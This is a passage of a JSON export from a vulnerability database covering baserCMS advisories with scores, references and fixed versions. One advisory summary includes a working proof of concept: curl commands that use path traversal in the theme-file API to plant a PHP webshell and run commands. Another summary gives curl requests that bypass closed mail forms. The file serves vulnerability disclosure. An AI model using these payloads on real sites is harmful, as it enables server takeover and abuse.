                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-ays7-6wvh-augt"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k575-suuf-7bhf"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-kmpp-6j49-pqfz"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"
                }
            ],
            "aliases": [
                "CVE-2021-41243",
                "GHSA-7rpc-9m88-cf9w"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=api",
            "vulnerability_id": "VCID-8buz-nsr9-3yge",
            "summary": "baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n    // ...\n    return $viewPath . $type . DS . $path;  // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n  -H \"Authorization: Bearer <token>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"theme\": \"BcThemeSample\",\n    \"plugin\": \"\",\n    \"type\": \"layout\",\n    \"path\": \"../../../../webroot/\",\n    \"base_name\": \"shell\",\n    \"ext\": \"php\",\n    \"contents\": \"<?php system($_GET[\\\"cmd\\\"]); ?>\"\n  }'\n\n# 3. 
RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. 
[CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>\n- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>\n- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>\n\nThis advisory was translated from Japanese to English using GitHub Copilot.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00145",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34571",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq",
                    "reference_id": "GHSA-c5c6-37vq-pjcq",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30940",
                "GHSA-c5c6-37vq-pjcq"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=api",
            "vulnerability_id": "VCID-8ssu-umet-37bk",
            "summary": "baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\nMalicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01615",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-677c-xv24-crgx",
                    "reference_id": "GHSA-677c-xv24-crgx",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-677c-xv24-crgx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-32734",
                "GHSA-677c-xv24-crgx"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/109472?format=api",
            "vulnerability_id": "VCID-ays7-6wvh-augt",
            "summary": "baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-42486",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3445",
                            "published_at": "2026-06-04T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34547",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-42486"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_53682526",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_53682526"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://jvn.jp/en/jp/JVN53682526/index.html",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"
                        }
                    ],
                    "url": "https://jvn.jp/en/jp/JVN53682526/index.html"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42486",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42486"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7w2v-35j3-xrm9",
                    "reference_id": "GHSA-7w2v-35j3-xrm9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7w2v-35j3-xrm9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.7.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        },
                        {
                            "vulnerability": "VCID-zxns-tzw3-27fr"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"
                }
            ],
            "aliases": [
                "CVE-2022-42486",
                "GHSA-7w2v-35j3-xrm9"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=api",
            "vulnerability_id": "VCID-d1sf-cmct-zbh1",
            "summary": "baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. 
Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05615",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c",
                    "reference_id": "GHSA-8cr7-r8qw-gp3c",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30878",
                "GHSA-8cr7-r8qw-gp3c"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46297?format=api",
            "vulnerability_id": "VCID-g56w-z9cx-5ygv",
            "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-29009",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.68361",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-29009"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_45547161",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_45547161"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
